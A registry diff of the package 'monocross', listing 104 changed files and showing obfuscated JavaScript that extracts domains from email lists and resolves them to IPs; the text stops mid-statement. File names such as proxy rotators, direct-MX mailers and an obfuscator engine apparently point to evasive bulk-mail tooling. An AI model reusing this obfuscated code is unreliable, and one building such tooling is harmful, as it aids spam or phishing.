monocross 1.0.1 → 1.0.3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (104) hide show
  1. package/_init/messages.html +8 -9
  2. package/_init/monotomic.json +7 -0
  3. package/commands/auth.js +1 -1
  4. package/commands/cleaner.js +1 -1
  5. package/commands/debounce.js +1 -1
  6. package/commands/extract.js +1 -1
  7. package/commands/features.js +1 -1
  8. package/commands/functions.js +1 -1
  9. package/commands/index.js +1 -1
  10. package/commands/init.js +1 -1
  11. package/commands/jdop.js +1 -1
  12. package/commands/judger.js +1 -1
  13. package/commands/mthp.js +1 -1
  14. package/commands/mx.js +1 -1
  15. package/commands/redirect.js +1 -1
  16. package/commands/renew.js +1 -1
  17. package/commands/send.js +1 -1
  18. package/commands/sort.js +1 -1
  19. package/commands/update.js +1 -1
  20. package/commands/user.js +1 -1
  21. package/commands/verify.js +1 -1
  22. package/denv.js +1 -1
  23. package/functions/advance.js +1 -1
  24. package/functions/auths.js +1 -1
  25. package/functions/cln/index.js +1 -1
  26. package/functions/conversion-source.js +1 -1
  27. package/functions/deb/buckets.js +1 -1
  28. package/functions/deb/dns-intel.js +1 -1
  29. package/functions/deb/domain-cache.js +1 -1
  30. package/functions/deb/index.js +1 -1
  31. package/functions/deb/rules.js +1 -1
  32. package/functions/deb/smtp-probe.js +1 -1
  33. package/functions/deps.js +1 -1
  34. package/functions/ext/index.js +1 -1
  35. package/functions/extends.js +1 -1
  36. package/functions/globals.js +1 -1
  37. package/functions/gtp/cHtmlRtf.js +1 -1
  38. package/functions/gtp/cHtmlRtfWImage.js +1 -1
  39. package/functions/gtp/cHtmlXls.js +1 -1
  40. package/functions/gtp/clientsidejs/processingHtml.js +1 -1
  41. package/functions/gtp/encryptHtml.js +1 -1
  42. package/functions/ipr/agents.js +1 -1
  43. package/functions/ipr/index.js +1 -1
  44. package/functions/ipr/parser.js +1 -1
  45. package/functions/ipr/probe.js +1 -1
  46. package/functions/ipr/proxy-engine.js +1 -1
  47. package/functions/ipr/rotator.js +1 -1
  48. package/functions/ipr/runtime.js +1 -1
  49. package/functions/ipr/smtp-handshake.js +1 -1
  50. package/functions/ipr/validate.js +1 -1
  51. package/functions/jdg/autodiscover.js +1 -1
  52. package/functions/jdg/dns-resolve.js +1 -1
  53. package/functions/jdg/domain-cache.js +1 -1
  54. package/functions/jdg/http.js +1 -1
  55. package/functions/jdg/index.js +1 -1
  56. package/functions/jdg/platforms.js +1 -1
  57. package/functions/message-encryption-engine.js +1 -1
  58. package/functions/mxc/index.js +1 -1
  59. package/functions/obfuscator-engine.js +1 -1
  60. package/functions/qrtest.js +1 -1
  61. package/functions/rdt/api-keys.js +1 -1
  62. package/functions/rdt/candidates.js +1 -1
  63. package/functions/rdt/cli-args.js +1 -1
  64. package/functions/rdt/dns-guard.js +1 -1
  65. package/functions/rdt/domain-budget.js +1 -1
  66. package/functions/rdt/http-client.js +1 -1
  67. package/functions/rdt/index.js +1 -1
  68. package/functions/rdt/output.js +1 -1
  69. package/functions/rdt/scanner.js +1 -1
  70. package/functions/rdt/sources.js +1 -1
  71. package/functions/rdt/utils.js +1 -1
  72. package/functions/renew.js +1 -1
  73. package/functions/snd/index.js +1 -1
  74. package/functions/snd/mailers/mailer-dns.js +1 -1
  75. package/functions/snd/mailers/mailer-ews.js +1 -1
  76. package/functions/snd/mailers/mailer-free.js +1 -1
  77. package/functions/snd/mailers/mailer-local.js +1 -1
  78. package/functions/snd/mailers/mailer-mx-direct.js +1 -1
  79. package/functions/snd/mailers/mailer-mx.js +1 -1
  80. package/functions/snd/mailers/mailer-proxy.js +1 -1
  81. package/functions/snd/mailers/mailer-zimbra.js +1 -1
  82. package/functions/snd/mailers/verify-zimbra.js +1 -1
  83. package/functions/srt/index.js +1 -1
  84. package/functions/user.js +1 -1
  85. package/functions/vrf/dns-resolve.js +1 -1
  86. package/functions/vrf/http-client.js +1 -1
  87. package/functions/vrf/index.js +1 -1
  88. package/functions/vrf/providers.js +1 -1
  89. package/functions/zip-archive.js +1 -1
  90. package/helpers.js +1 -1
  91. package/package.json +3 -2
  92. package/ultra.js +1 -1
  93. package/utils/checker.js +1 -1
  94. package/utils/colors.js +1 -1
  95. package/utils/features.js +1 -1
  96. package/utils/hide.js +1 -1
  97. package/utils/jdfr.js +1 -1
  98. package/utils/jwtVerify.js +1 -1
  99. package/utils/mthp.js +1 -1
  100. package/utils/placeholders.js +1 -1
  101. package/utils/tok.js +1 -1
  102. package/utils/types.js +1 -1
  103. package/utils/validation.js +1 -1
  104. package/utils/whid.js +1 -1
@@ -1 +1 @@
1
- const a31_0x277dcc=a31_0xf655;(function(_0x3ff2c6,_0xebc0a3){const _0xde2cd0=a31_0xf655,_0x44fdfe=_0x3ff2c6();while(!![]){try{const _0x50227f=parseInt(_0xde2cd0(0xde))/0x1*(parseInt(_0xde2cd0(0xb8))/0x2)+-parseInt(_0xde2cd0(0xb2))/0x3+-parseInt(_0xde2cd0(0x72))/0x4+parseInt(_0xde2cd0(0x97))/0x5+-parseInt(_0xde2cd0(0x8e))/0x6+-parseInt(_0xde2cd0(0xcd))/0x7*(parseInt(_0xde2cd0(0x76))/0x8)+parseInt(_0xde2cd0(0xb4))/0x9;if(_0x50227f===_0xebc0a3)break;else _0x44fdfe['push'](_0x44fdfe['shift']());}catch(_0xe5416a){_0x44fdfe['push'](_0x44fdfe['shift']());}}}(a31_0x326f,0xbe7f8));const a31_0x50d034=(function(){let _0x5cd6d8=!![];return function(_0x1778ca,_0x10727e){const _0x1e4d46=_0x5cd6d8?function(){if(_0x10727e){const _0x47e427=_0x10727e['apply'](_0x1778ca,arguments);return _0x10727e=null,_0x47e427;}}:function(){};return _0x5cd6d8=![],_0x1e4d46;};}()),a31_0x6540f5=a31_0x50d034(this,function(){const _0x3cf22d=a31_0xf655;return a31_0x6540f5[_0x3cf22d(0x7e)]()['search'](_0x3cf22d(0x99))[_0x3cf22d(0x7e)]()['constructor'](a31_0x6540f5)[_0x3cf22d(0x6a)](_0x3cf22d(0x99));});a31_0x6540f5();const fs=require('fs'),dns=require(a31_0x277dcc(0x69))[a31_0x277dcc(0xdc)],path=require(a31_0x277dcc(0xa2)),chalk=require(a31_0x277dcc(0x79)),{once}=require(a31_0x277dcc(0x7a)),{CURRENT_DIR,alertUser,spinnerFunc,executionCompleted,getDomain}=require(a31_0x277dcc(0xe0)),JwtVerify=require('../../utils/jwtVerify'),EXTRACTOR_CONCURRENCY=Math['max'](0x1,Math[a31_0x277dcc(0x6b)](0x64,Number(process[a31_0x277dcc(0xa5)][a31_0x277dcc(0xaf)])||0x19)),DNS_TIMEOUT_MS=Math[a31_0x277dcc(0xc5)](0x3e8,Math['min'](0xea60,Number(process[a31_0x277dcc(0xa5)][a31_0x277dcc(0x6f)])||0x1f40)),DNS_RETRIES=Math[a31_0x277dcc(0xc5)](0x0,Math[a31_0x277dcc(0x6b)](0x5,Number(process[a31_0x277dcc(0xa5)][a31_0x277dcc(0x6d)])||0x1)),PROGRESS_EVERY=Math[a31_0x277dcc(0xc5)](0x3e8,Number(process[a31_0x277dcc(0xa5)][a31_0x277dcc(0xbf)])||0xc350);function parseAddHttpOption(_0x1639e2){const _0x28e7ca=a31_0x277dcc;if(_0x1639e2===!![]||_0x1639e2===0x1)return!![];if(_0x1639e2===![]||_0x1639e2===0x0||_0x1639e2==null)return![];const _0x3907cf=String(_0x1639e2)['trim']()[_0x28e7ca(0xb6)]();if(['1',_0x28e7ca(0xc7),_0x28e7ca(0xe7),'y','on',_0x28e7ca(0x9a),'enabled']['includes'](_0x3907cf))return!![];if(['0',_0x28e7ca(0x77),'no','n',_0x28e7ca(0x8b),_0x28e7ca(0xd1),_0x28e7ca(0xc2)][_0x28e7ca(0xdd)](_0x3907cf))return![];return![];}function parseIpVersionOption(_0x52c612){const _0x2bb140=a31_0x277dcc;if(_0x52c612==null||_0x52c612==='')return _0x2bb140(0xd6);const _0x3fc524=String(_0x52c612)[_0x2bb140(0x73)]()['toLowerCase']();if([_0x2bb140(0xba),'4','v4','a'][_0x2bb140(0xdd)](_0x3fc524))return _0x2bb140(0xba);if([_0x2bb140(0xa9),'6','v6',_0x2bb140(0xe3)]['includes'](_0x3fc524))return _0x2bb140(0xa9);return _0x2bb140(0xd6);}function resolveExtractOptions(_0x3ce5a4={}){const _0x38ce38=a31_0x277dcc,_0x28ae51=parseAddHttpOption(process[_0x38ce38(0xa5)][_0x38ce38(0xe2)]),_0x2d5971=_0x3ce5a4['addHttp']===undefined?_0x28ae51:parseAddHttpOption(_0x3ce5a4[_0x38ce38(0xbd)]),_0x5c5106=parseIpVersionOption(process['env']['EXTRACTOR_IP_VERSION']),_0x30b23f=_0x3ce5a4[_0x38ce38(0xa7)]===undefined?_0x5c5106:parseIpVersionOption(_0x3ce5a4[_0x38ce38(0xa7)]);return{'addHttp':_0x2d5971,'ipVersion':_0x30b23f};}function applyHttpPrefix(_0x317d7d,_0x33cb3f=![]){const _0x819f6b=a31_0x277dcc,_0x1b78db=String(_0x317d7d||'')[_0x819f6b(0x73)]();if(!_0x1b78db||!_0x33cb3f)return _0x1b78db;if(/^https?:\/\//i[_0x819f6b(0xc9)](_0x1b78db))return _0x1b78db;return _0x819f6b(0x91)+_0x1b78db;}function formatExtractValue(_0xef0f55,_0x2d8efd={}){const _0x1f6d7c=a31_0x277dcc;return applyHttpPrefix(_0xef0f55,!!_0x2d8efd[_0x1f6d7c(0xbd)]);}function announceTitle(_0x1707f9,_0x6584b8={}){const _0x18cf15=a31_0x277dcc,_0x718b0c=[];if(_0x1707f9===_0x18cf15(0x74)){if(_0x6584b8[_0x18cf15(0xa7)]===_0x18cf15(0xba))_0x718b0c[_0x18cf15(0xd9)](_0x18cf15(0x8d));else{if(_0x6584b8['ipVersion']===_0x18cf15(0xa9))_0x718b0c[_0x18cf15(0xd9)]('IPv6\x20only');else _0x718b0c['push'](_0x18cf15(0xce));}}if(_0x6584b8[_0x18cf15(0xbd)])_0x718b0c[_0x18cf15(0xd9)]('http://\x20prefix');const _0x5cfbd2=_0x718b0c[_0x18cf15(0x82)]?'\x20('+_0x718b0c[_0x18cf15(0x78)](',\x20')+')':'';return console['log'](_0x18cf15(0xd7)+chalk[_0x18cf15(0xc4)](''+_0x1707f9+_0x5cfbd2)+_0x18cf15(0xd8));}function extractIPs(_0x21f9f6,_0x4be0b5={}){const _0x37c0ac=a31_0x277dcc;JwtVerify();const _0x4e80f8=resolveExtractOptions(_0x4be0b5);return announceTitle(_0x37c0ac(0x74),_0x4e80f8),runIpExtraction(_0x21f9f6,_0x4e80f8)[_0x37c0ac(0xb9)](fatalExtractorError);}function extractDomains(_0x1cffd3,_0x562d67={}){const _0x5238c2=a31_0x277dcc;JwtVerify();const _0x92b83f=resolveExtractOptions(_0x562d67);return announceTitle('Domains',_0x92b83f),runDomainExtraction(_0x1cffd3,_0x92b83f)[_0x5238c2(0xb9)](fatalExtractorError);}function a31_0x326f(){const _0x53b2a6=['domains.ips.txt','replace','write','createWriteStream','EXTRACTOR_CONCURRENCY','finally','errors','1129926daSrXg','extractorError','31424175mBqOpz','exit','toLowerCase','once','518jRIpVe','catch','ipv4','\x20lookup\x20timed\x20out\x20for\x20','then','addHttp','endsWith','EXTRACTOR_PROGRESS_EVERY','add','text','disabled','Domain\x20to\x20IP\x20extraction','yellowBright','max','all','true','uniqueDomains','test','log','\x20domains','·\x20Output\x20format\x20\x20:\x20http://\x20prefix\x20added\x20to\x20','7xyxqKQ','IPv4\x20+\x20IPv6','from','stop','disable','records','split','ips.emails.txt','delete','both','Extracting\x20emails\x20for...\x20[\x20','\x20]\x0a','push','domains','exports','promises','includes','53RsOufo','allSettled','../../functions/globals','scanned','EXTRACTOR_ADD_HTTP','aaaa','resolve4','Domain\x20extraction','update','yes','dns','search','min','end','EXTRACTOR_DNS_RETRIES','toLocaleString','EXTRACTOR_DNS_TIMEOUT_MS','size','function','5399028lrMZUL','trim','IPs','·\x20Emails\x20scanned\x20:\x20','7773448yaPvcp','false','join','chalk','events','value','message','ESERVFAIL','toString','Streaming\x20emails\x20and\x20resolving\x20DNS...','Scanned\x20','../../utils/jwtVerify','length','duplicates','domains.ips.errors.txt','drain','startsWith','EAI_AGAIN','has','\x20done','some','off','ECONNRESET','IPv4\x20only','4118088GVYQbm','AAAA','·\x20Unique\x20domains\x20:\x20','http://','·\x20DNS\x20errors\x20\x20\x20\x20\x20:\x20','misses','error','toUpperCase','·\x20IP\x20version\x20\x20\x20\x20\x20:\x20','3297030elUMGK','domains.emails.txt','(((.+)+)+)+$','enable','number','map','code','utf8','denyDirectModuleAccess','every','DNS_ERROR','path','\x20emails,\x20queued\x20','race','env','·\x20Output\x20\x20\x20\x20\x20\x20\x20\x20\x20:\x20','ipVersion','Streaming\x20emails...','ipv6','ETIMEOUT'];a31_0x326f=function(){return _0x53b2a6;};return a31_0x326f();}module[a31_0x277dcc(0xdb)]={'extractIPs':extractIPs,'extractDomains':extractDomains,'applyHttpPrefix':applyHttpPrefix,'formatExtractValue':formatExtractValue,'resolveExtractOptions':resolveExtractOptions,'parseAddHttpOption':parseAddHttpOption,'parseIpVersionOption':parseIpVersionOption},require(a31_0x277dcc(0x81))[a31_0x277dcc(0x9f)]('extract');function fatalExtractorError(_0x5f1c33){const _0x147b9c=a31_0x277dcc;console[_0x147b9c(0x94)](_0x5f1c33?.[_0x147b9c(0x7c)]||_0x5f1c33),process[_0x147b9c(0xb5)](0x1);}async function*toAsyncIterable(_0x4704bb){const _0x2036e0=a31_0x277dcc;if(!_0x4704bb)return;if(typeof _0x4704bb[Symbol['asyncIterator']]==='function'){for await(const _0x49380a of _0x4704bb)yield _0x49380a;return;}if(typeof _0x4704bb[Symbol['iterator']]===_0x2036e0(0x71)){for(const _0x200b93 of _0x4704bb)yield _0x200b93;}}function normalizeDomainFromEmail(_0x4bed9e){const _0x2dc8a5=a31_0x277dcc,_0x437d43=String(_0x4bed9e||'')['trim']()[_0x2dc8a5(0xb6)]();if(!_0x437d43||!_0x437d43[_0x2dc8a5(0xdd)]('@'))return'';const _0x3b1472=getDomain(_0x437d43)[_0x2dc8a5(0xb6)]()[_0x2dc8a5(0xac)](/\.$/,'');return isValidDomain(_0x3b1472)?_0x3b1472:'';}function isValidDomain(_0xdf4647){const _0x5526ca=a31_0x277dcc,_0x30790d=String(_0xdf4647||'')['trim']()['toLowerCase']();if(!_0x30790d||_0x30790d[_0x5526ca(0x82)]>0xfd||_0x30790d[_0x5526ca(0xdd)]('..'))return![];const _0x18ed19=_0x30790d[_0x5526ca(0xd3)]('.');if(_0x18ed19['length']<0x2)return![];return _0x18ed19[_0x5526ca(0xa0)](_0x2c9552=>{const _0x3f2468=_0x5526ca;return _0x2c9552[_0x3f2468(0x82)]>0x0&&_0x2c9552[_0x3f2468(0x82)]<=0x3f&&/^[a-z0-9-]+$/i['test'](_0x2c9552)&&!_0x2c9552[_0x3f2468(0x86)]('-')&&!_0x2c9552[_0x3f2468(0xbe)]('-');});}function createLineWriter(_0x314d8c){const _0x32bf5c=a31_0x277dcc,_0x52cdb0=fs[_0x32bf5c(0xae)](path[_0x32bf5c(0x78)](CURRENT_DIR,_0x314d8c),{'flags':'w','encoding':_0x32bf5c(0x9e),'highWaterMark':0x400*0x400});return _0x52cdb0[_0x32bf5c(0xb3)]=null,_0x52cdb0['on'](_0x32bf5c(0x94),_0x170afa=>{const _0x5c02c1=_0x32bf5c;_0x52cdb0[_0x5c02c1(0xb3)]=_0x170afa;}),_0x52cdb0;}async function writeLine(_0x5a6649,_0x2785bb){const _0x4fff0a=a31_0x277dcc;if(_0x5a6649[_0x4fff0a(0xb3)])throw _0x5a6649[_0x4fff0a(0xb3)];!_0x5a6649[_0x4fff0a(0xad)](_0x2785bb+'\x0a',_0x4fff0a(0x9e))&&await Promise['race']([once(_0x5a6649,_0x4fff0a(0x85)),once(_0x5a6649,'error')[_0x4fff0a(0xbc)](([_0x5c95dd])=>{throw _0x5c95dd;})]);if(_0x5a6649['extractorError'])throw _0x5a6649[_0x4fff0a(0xb3)];}function a31_0xf655(_0x478e9e,_0x113ffb){_0x478e9e=_0x478e9e-0x69;const _0x48ca02=a31_0x326f();let _0x6540f5=_0x48ca02[_0x478e9e];return _0x6540f5;}async function closeWriter(_0x1f2141){const _0xb45ec4=a31_0x277dcc;if(!_0x1f2141)return;if(_0x1f2141[_0xb45ec4(0xb3)])throw _0x1f2141['extractorError'];await new Promise((_0xc57886,_0x3ef623)=>{const _0x4c18c8=_0xb45ec4;_0x1f2141[_0x4c18c8(0xb7)](_0x4c18c8(0x94),_0x3ef623),_0x1f2141[_0x4c18c8(0x6c)](_0xc57886);});if(_0x1f2141['extractorError'])throw _0x1f2141[_0xb45ec4(0xb3)];}function updateProgress(_0x328301,_0xe42c40){const _0x562d9a=a31_0x277dcc;if(!_0x328301)return;if(typeof _0x328301[_0x562d9a(0xe6)]===_0x562d9a(0x71))_0x328301[_0x562d9a(0xe6)]({'text':_0xe42c40});else{if(_0x562d9a(0xc1)in _0x328301)_0x328301[_0x562d9a(0xc1)]=_0xe42c40;}}function shouldReportProgress(_0x38fc10){const _0xa6b51d=a31_0x277dcc;return _0x38fc10[_0xa6b51d(0xe1)]>0x0&&_0x38fc10['scanned']%PROGRESS_EVERY===0x0;}function printSummary(_0x4acfb1,_0x1d5f2a,_0xad4c0e=[],_0x5caa95={}){const _0x53e262=a31_0x277dcc;executionCompleted(),console[_0x53e262(0xca)](chalk['bold']('\x0a'+_0x4acfb1+_0x53e262(0x89))),console['log'](_0x53e262(0x75)+_0x1d5f2a['scanned'][_0x53e262(0x6e)]()),console['log'](_0x53e262(0x90)+_0x1d5f2a[_0x53e262(0xc8)][_0x53e262(0x6e)]());if(_0x5caa95['addHttp']){const _0x25dcb9=typeof _0x1d5f2a[_0x53e262(0xd2)]===_0x53e262(0x9b)?_0x53e262(0x74):_0x53e262(0xda);console[_0x53e262(0xca)](_0x53e262(0xcc)+_0x25dcb9);}typeof _0x1d5f2a[_0x53e262(0xd2)]==='number'&&_0x5caa95[_0x53e262(0xa7)]&&_0x5caa95[_0x53e262(0xa7)]!==_0x53e262(0xd6)&&console[_0x53e262(0xca)](_0x53e262(0x96)+_0x5caa95[_0x53e262(0xa7)][_0x53e262(0x95)]()+'\x20only');typeof _0x1d5f2a['records']===_0x53e262(0x9b)&&(console[_0x53e262(0xca)]('·\x20IP\x20records\x20\x20\x20\x20\x20:\x20'+_0x1d5f2a[_0x53e262(0xd2)][_0x53e262(0x6e)]()),console['log']('·\x20DNS\x20misses\x20\x20\x20\x20\x20:\x20'+_0x1d5f2a[_0x53e262(0x93)][_0x53e262(0x6e)]()),console['log'](_0x53e262(0x92)+_0x1d5f2a[_0x53e262(0xb1)][_0x53e262(0x6e)]()));console['log']('·\x20Duplicates\x20\x20\x20\x20\x20:\x20'+_0x1d5f2a[_0x53e262(0x83)]['toLocaleString']());for(const _0x2a5043 of _0xad4c0e)console['log'](_0x53e262(0xa6)+_0x2a5043);console['log'](''),alertUser();}async function runDomainExtraction(_0x1aa910,_0x2f4074={}){const _0xbcece4=a31_0x277dcc,_0x5e4a7d=spinnerFunc({'text':_0xbcece4(0xa8)}),_0x181182=createLineWriter(_0xbcece4(0x98)),_0x2b6bb8=new Set(),_0x4c6214={'scanned':0x0,'uniqueDomains':0x0,'duplicates':0x0};try{for await(const _0x133feb of toAsyncIterable(_0x1aa910)){_0x4c6214[_0xbcece4(0xe1)]++;const _0x339a60=normalizeDomainFromEmail(_0x133feb);if(!_0x339a60)continue;if(_0x2b6bb8['has'](_0x339a60)){_0x4c6214[_0xbcece4(0x83)]++;continue;}_0x2b6bb8[_0xbcece4(0xc0)](_0x339a60),_0x4c6214['uniqueDomains']++,await writeLine(_0x181182,formatExtractValue(_0x339a60,_0x2f4074)),shouldReportProgress(_0x4c6214)&&updateProgress(_0x5e4a7d,_0xbcece4(0x80)+_0x4c6214[_0xbcece4(0xe1)][_0xbcece4(0x6e)]()+'\x20emails,\x20wrote\x20'+_0x4c6214[_0xbcece4(0xc8)]['toLocaleString']()+_0xbcece4(0xcb));}}finally{await closeWriter(_0x181182);if(_0x5e4a7d&&typeof _0x5e4a7d[_0xbcece4(0xd0)]===_0xbcece4(0x71))_0x5e4a7d[_0xbcece4(0xd0)]();}printSummary(_0xbcece4(0xe5),_0x4c6214,['domains.emails.txt'],_0x2f4074);}function timeoutError(_0x1f7807,_0x27c7da){const _0x374212=a31_0x277dcc,_0x46145d=new Error(_0x27c7da+_0x374212(0xbb)+_0x1f7807);return _0x46145d[_0x374212(0x9d)]=_0x374212(0xaa),_0x46145d;}async function withTimeout(_0x3add51,_0x22d420,_0x42cf99,_0x40d108){const _0x44b923=a31_0x277dcc;let _0x44e8cd=null;try{return await Promise[_0x44b923(0xa4)]([_0x3add51,new Promise((_0x3c2b3c,_0x301be9)=>{_0x44e8cd=setTimeout(()=>_0x301be9(timeoutError(_0x42cf99,_0x40d108)),_0x22d420);})]);}finally{if(_0x44e8cd)clearTimeout(_0x44e8cd);}}async function resolveRecord(_0x3acccd,_0x5dc831){const _0x333a8e=a31_0x277dcc,_0x373b23=_0x5dc831==='AAAA'?dns['resolve6'](_0x3acccd):dns[_0x333a8e(0xe4)](_0x3acccd);return withTimeout(_0x373b23,DNS_TIMEOUT_MS,_0x3acccd,_0x5dc831);}function isRetryableDnsError(_0x1886f8){const _0x3d1612=a31_0x277dcc;return[_0x3d1612(0xaa),_0x3d1612(0x87),_0x3d1612(0x7d),_0x3d1612(0x8c)][_0x3d1612(0xdd)](_0x1886f8?.[_0x3d1612(0x9d)]);}async function resolveDomainIps(_0x204daf,_0x4d397d=a31_0x277dcc(0xd6)){const _0x5613e3=a31_0x277dcc,_0x24beaf=[];if(_0x4d397d==='both'||_0x4d397d===_0x5613e3(0xba))_0x24beaf[_0x5613e3(0xd9)]('A');if(_0x4d397d===_0x5613e3(0xd6)||_0x4d397d===_0x5613e3(0xa9))_0x24beaf['push'](_0x5613e3(0x8f));let _0x25e6f2=[];for(let _0x28f185=0x0;_0x28f185<=DNS_RETRIES;_0x28f185++){const _0x5db558=await Promise[_0x5613e3(0xdf)](_0x24beaf[_0x5613e3(0x9c)](_0x103218=>resolveRecord(_0x204daf,_0x103218))),_0x42b29d=[];_0x25e6f2=[];for(const _0x3b7fe8 of _0x5db558){if(_0x3b7fe8['status']==='fulfilled')_0x42b29d[_0x5613e3(0xd9)](..._0x3b7fe8[_0x5613e3(0x7b)]);else _0x25e6f2[_0x5613e3(0xd9)](_0x3b7fe8['reason']);}if(_0x42b29d[_0x5613e3(0x82)])return{'ips':Array[_0x5613e3(0xcf)](new Set(_0x42b29d)),'error':null};if(!_0x25e6f2[_0x5613e3(0x8a)](isRetryableDnsError))break;}const _0xc56ddf=_0x25e6f2[_0x5613e3(0x9c)](_0x36ea07=>_0x36ea07?.[_0x5613e3(0x9d)]||_0x36ea07?.[_0x5613e3(0x7c)]||_0x5613e3(0xa1))[_0x5613e3(0x78)](',\x20');return{'ips':[],'error':_0xc56ddf||'DNS_ERROR'};}async function runIpExtraction(_0x50a433,_0x11d872={}){const _0x446614=a31_0x277dcc,_0x15b36a=spinnerFunc({'text':_0x446614(0x7f)}),_0x2cb0c2=createLineWriter(_0x446614(0xd4)),_0x47abd4=createLineWriter(_0x446614(0xab)),_0x46c623=createLineWriter(_0x446614(0x84)),_0x4cd213=new Set(),_0x4d0908=new Set(),_0xa49804=new Set(),_0x52783={'scanned':0x0,'uniqueDomains':0x0,'duplicates':0x0,'records':0x0,'misses':0x0,'errors':0x0};async function _0x4f3672(_0x1e0ba9){const _0xfd1888=_0x446614,{ips:_0x2a62c3,error:_0x806a9c}=await resolveDomainIps(_0x1e0ba9,_0x11d872[_0xfd1888(0xa7)]),_0x3a7f0d=formatExtractValue(_0x1e0ba9,_0x11d872);if(!_0x2a62c3[_0xfd1888(0x82)]){_0x806a9c?(_0x52783[_0xfd1888(0xb1)]++,await writeLine(_0x46c623,_0x3a7f0d+'|'+_0x806a9c)):_0x52783[_0xfd1888(0x93)]++;return;}for(const _0x363cd9 of _0x2a62c3){const _0x296c58=formatExtractValue(_0x363cd9,_0x11d872);await writeLine(_0x47abd4,_0x3a7f0d+'|'+_0x296c58);if(_0x4d0908[_0xfd1888(0x88)](_0x363cd9))continue;_0x4d0908[_0xfd1888(0xc0)](_0x363cd9),_0x52783[_0xfd1888(0xd2)]++,await writeLine(_0x2cb0c2,_0x296c58);}}try{for await(const _0x1b4647 of toAsyncIterable(_0x50a433)){_0x52783[_0x446614(0xe1)]++;const _0x29313b=normalizeDomainFromEmail(_0x1b4647);if(!_0x29313b)continue;if(_0x4cd213[_0x446614(0x88)](_0x29313b)){_0x52783['duplicates']++;continue;}_0x4cd213[_0x446614(0xc0)](_0x29313b),_0x52783[_0x446614(0xc8)]++;const _0xf0a48c=_0x4f3672(_0x29313b)[_0x446614(0xb0)](()=>_0xa49804[_0x446614(0xd5)](_0xf0a48c));_0xa49804[_0x446614(0xc0)](_0xf0a48c);if(_0xa49804[_0x446614(0x70)]>=EXTRACTOR_CONCURRENCY)await Promise['race'](_0xa49804);shouldReportProgress(_0x52783)&&updateProgress(_0x15b36a,_0x446614(0x80)+_0x52783[_0x446614(0xe1)][_0x446614(0x6e)]()+_0x446614(0xa3)+_0x52783[_0x446614(0xc8)][_0x446614(0x6e)]()+'\x20domains');}await Promise[_0x446614(0xc6)](_0xa49804);}finally{await Promise[_0x446614(0xc6)]([closeWriter(_0x2cb0c2),closeWriter(_0x47abd4),closeWriter(_0x46c623)]);if(_0x15b36a&&typeof _0x15b36a[_0x446614(0xd0)]==='function')_0x15b36a[_0x446614(0xd0)]();}printSummary(_0x446614(0xc3),_0x52783,['ips.emails.txt','domains.ips.txt','domains.ips.errors.txt'],_0x11d872);}
1
+ const a31_0x28ac19=a31_0x5991;(function(_0x6c78f5,_0x2df069){const _0x3a4a74=a31_0x5991,_0x56e481=_0x6c78f5();while(!![]){try{const _0x30f5c7=-parseInt(_0x3a4a74(0x1d3))/0x1*(parseInt(_0x3a4a74(0x219))/0x2)+parseInt(_0x3a4a74(0x1fc))/0x3*(parseInt(_0x3a4a74(0x1ef))/0x4)+-parseInt(_0x3a4a74(0x227))/0x5+-parseInt(_0x3a4a74(0x1ff))/0x6+parseInt(_0x3a4a74(0x1ee))/0x7+-parseInt(_0x3a4a74(0x1ce))/0x8+-parseInt(_0x3a4a74(0x1db))/0x9*(-parseInt(_0x3a4a74(0x221))/0xa);if(_0x30f5c7===_0x2df069)break;else _0x56e481['push'](_0x56e481['shift']());}catch(_0x338b0e){_0x56e481['push'](_0x56e481['shift']());}}}(a31_0xb2e9,0xa94ac));function a31_0xb2e9(){const _0x559ca5=['number','EXTRACTOR_PROGRESS_EVERY','trim','then','includes','4781469iRtnFe','5525724GyYNAP','endsWith','utf8','search','error','split','misses','Streaming\x20emails...','Scanned\x20','disable','toLocaleString','ipv6','EXTRACTOR_DNS_RETRIES','3rdAtqK','\x20lookup\x20timed\x20out\x20for\x20','update','7903608lWXOPD','text','EXTRACTOR_CONCURRENCY','env','bold','ESERVFAIL','off','resolve4','scanned','../../utils/jwtVerify','length','delete','dns','·\x20Duplicates\x20\x20\x20\x20\x20:\x20','·\x20Output\x20format\x20\x20:\x20http://\x20prefix\x20added\x20to\x20','http://','function','false','startsWith','\x20domains','domains.emails.txt','replace','fulfilled','catch','ipv4','extractorError','575290opFTpL','·\x20DNS\x20misses\x20\x20\x20\x20\x20:\x20','finally','duplicates','addHttp','DNS_ERROR','ipVersion','IPs','2059890eoefSL','EXTRACTOR_IP_VERSION','once','toLowerCase','denyDirectModuleAccess','some','59550InBUqQ','Streaming\x20emails\x20and\x20resolving\x20DNS...','records','Domains','ETIMEOUT','IPv4\x20+\x20IPv6','Extracting\x20emails\x20for...\x20[\x20','all','true','exports','race','write','reason','IPv4\x20only','·\x20DNS\x20errors\x20\x20\x20\x20\x20:\x20','log','domains.ips.errors.txt','both','test','\x20only','end','·\x20IP\x20records\x20\x20\x20\x20\x20:\x20','code','domains.ips.txt','max','\x20done','toString','extract','·\x20Emails\x20scanned\x20:\x20','uniqueDomains','add','yellowBright','·\x20Unique\x20domains\x20:\x20','drain','has','EXTRACTOR_ADD_HTTP','Domain\x20extraction','iterator','2324528dmiykV','every','size','ips.emails.txt','yes','2nnLqhk','EAI_AGAIN','apply','map','from','IPv6\x20only','min','message','36dHSvpa','aaaa','value','allSettled','push','exit','stop','path','AAAA','(((.+)+)+)+$','status','chalk','http://\x20prefix','Domain\x20to\x20IP\x20extraction'];a31_0xb2e9=function(){return _0x559ca5;};return a31_0xb2e9();}const a31_0x381018=(function(){let _0x2378c9=!![];return function(_0x43a96b,_0x292011){const _0xcf0afe=_0x2378c9?function(){const _0x1abe32=a31_0x5991;if(_0x292011){const _0x4070d8=_0x292011[_0x1abe32(0x1d5)](_0x43a96b,arguments);return _0x292011=null,_0x4070d8;}}:function(){};return _0x2378c9=![],_0xcf0afe;};}()),a31_0x31cde3=a31_0x381018(this,function(){const _0x42b082=a31_0x5991;return a31_0x31cde3['toString']()['search'](_0x42b082(0x1e4))[_0x42b082(0x1c2)]()['constructor'](a31_0x31cde3)[_0x42b082(0x1f2)](_0x42b082(0x1e4));});a31_0x31cde3();const 